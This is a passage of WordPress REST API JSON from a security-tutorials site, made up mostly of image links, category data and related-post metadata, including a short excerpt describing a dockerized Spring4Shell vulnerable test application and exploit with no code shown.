Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiAQDgEntDuPal05FKKW-I-Gb1K0FT3fzQYo2tE0-3j6ui6XTCeVuhvcdxjbxhdz4RjW61nSaEfjVgRrg-UTUEkFK_n0m5YNzTKwnpgC3rpwi0FaHyC6aEAWLtI8-ZJCK-phlYKTlsxv5zlyaxj4ADprZkP7lWHAOPlxnjCSiEK7sWMZBCrI7cS2og9\/s728\/download%20%282%29.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiAQDgEntDuPal05FKKW-I-Gb1K0FT3fzQYo2tE0-3j6ui6XTCeVuhvcdxjbxhdz4RjW61nSaEfjVgRrg-UTUEkFK_n0m5YNzTKwnpgC3rpwi0FaHyC6aEAWLtI8-ZJCK-phlYKTlsxv5zlyaxj4ADprZkP7lWHAOPlxnjCSiEK7sWMZBCrI7cS2og9\/s728\/download%20%282%29.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiAQDgEntDuPal05FKKW-I-Gb1K0FT3fzQYo2tE0-3j6ui6XTCeVuhvcdxjbxhdz4RjW61nSaEfjVgRrg-UTUEkFK_n0m5YNzTKwnpgC3rpwi0FaHyC6aEAWLtI8-ZJCK-phlYKTlsxv5zlyaxj4ADprZkP7lWHAOPlxnjCSiEK7sWMZBCrI7cS2og9\/s728\/download%20%282%29.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiAQDgEntDuPal05FKKW-I-Gb1K0FT3fzQYo2tE0-3j6ui6XTCeVuhvcdxjbxhdz4RjW61nSaEfjVgRrg-UTUEkFK_n0m5YNzTKwnpgC3rpwi0FaHyC6aEAWLtI8-ZJCK-phlYKTlsxv5zlyaxj4ADprZkP7lWHAOPlxnjCSiEK7sWMZBCrI7cS2og9\/s728\/download%20%282%29.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":25433,"url":"https:\/\/kalilinuxtutorials.com\/spring4shell-poc\/","url_meta":{"origin":25758,"position":5},"title":"Spring4Shell-POC : Dockerized Spring4Shell (CVE-2022-22965) PoC Application And Exploit","author":"R K","date":"June 22, 2022","format":false,"excerpt":"Spring4Shell-POC is a dockerized application that is vulnerable to the Spring4Shell vulnerability (CVE-2022-22965). Full Java source for the war is provided and modifiable, the war will get re-built whenever the docker image is built. The built WAR will then be loaded by Tomcat. There is nothing special about this application,\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhXBX7QYa-p7YYh9Mux8Rl6bL7aEI0TomwhoEzh888--uY2SCbceL-lgFc72O-6-sHvUEqLv0CxE5jVErmDwfH-DwxKbvzDNuqNrFpSWmyWacHpyemuwZyHYcfQXaZJP7amqcfGEZHG_yGSYMXS2j8s08WEYIiNFubLrdVfRD3W5K5G5MX-V71rpqm2\/s728\/Spring4Shell%20%281%29.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhXBX7QYa-p7YYh9Mux8Rl6bL7aEI0TomwhoEzh888--uY2SCbceL-lgFc72O-6-sHvUEqLv0CxE5jVErmDwfH-DwxKbvzDNuqNrFpSWmyWacHpyemuwZyHYcfQXaZJP7amqcfGEZHG_yGSYMXS2j8s08WEYIiNFubLrdVfRD3W5K5G5MX-V71rpqm2\/s728\/Spring4Shell%20%281%29.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhXBX7QYa-p7YYh9Mux8Rl6bL7aEI0TomwhoEzh888--uY2SCbceL-lgFc72O-6-sHvUEqLv0CxE5jVErmDwfH-DwxKbvzDNuqNrFpSWmyWacHpyemuwZyHYcfQXaZJP7amqcfGEZHG_yGSYMXS2j8s08WEYIiNFubLrdVfRD3W5K5G5MX-V71rpqm2\/s728\/Spring4Shell%20%281%29.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhXBX7QYa-p7YYh9Mux8Rl6bL7aEI0TomwhoEzh888--uY2SCbceL-lgFc72O-6-sHvUEqLv0CxE5jVErmDwfH-DwxKbvzDNuqNrFpSWmyWacHpyemuwZyHYcfQXaZJP7amqcfGEZHG_yGSYMXS2j8s08WEYIiNFubLrdVfRD3W5K5G5MX-V71rpqm2\/s728\/Spring4Shell%20%281%29.png?resize=700%2C400&ssl=1 2x"},"classes":[]}],"_links":{"self":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/25758","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/comments?post=25758"}],"version-history":[{"count":9,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/25758\/revisions"}],"predecessor-version":[{"id":25914,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/25758\/revisions\/25914"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media\/25767"}],"wp:attachment":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media?parent=25758"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/categories?post=25758"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/tags?post=25758"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}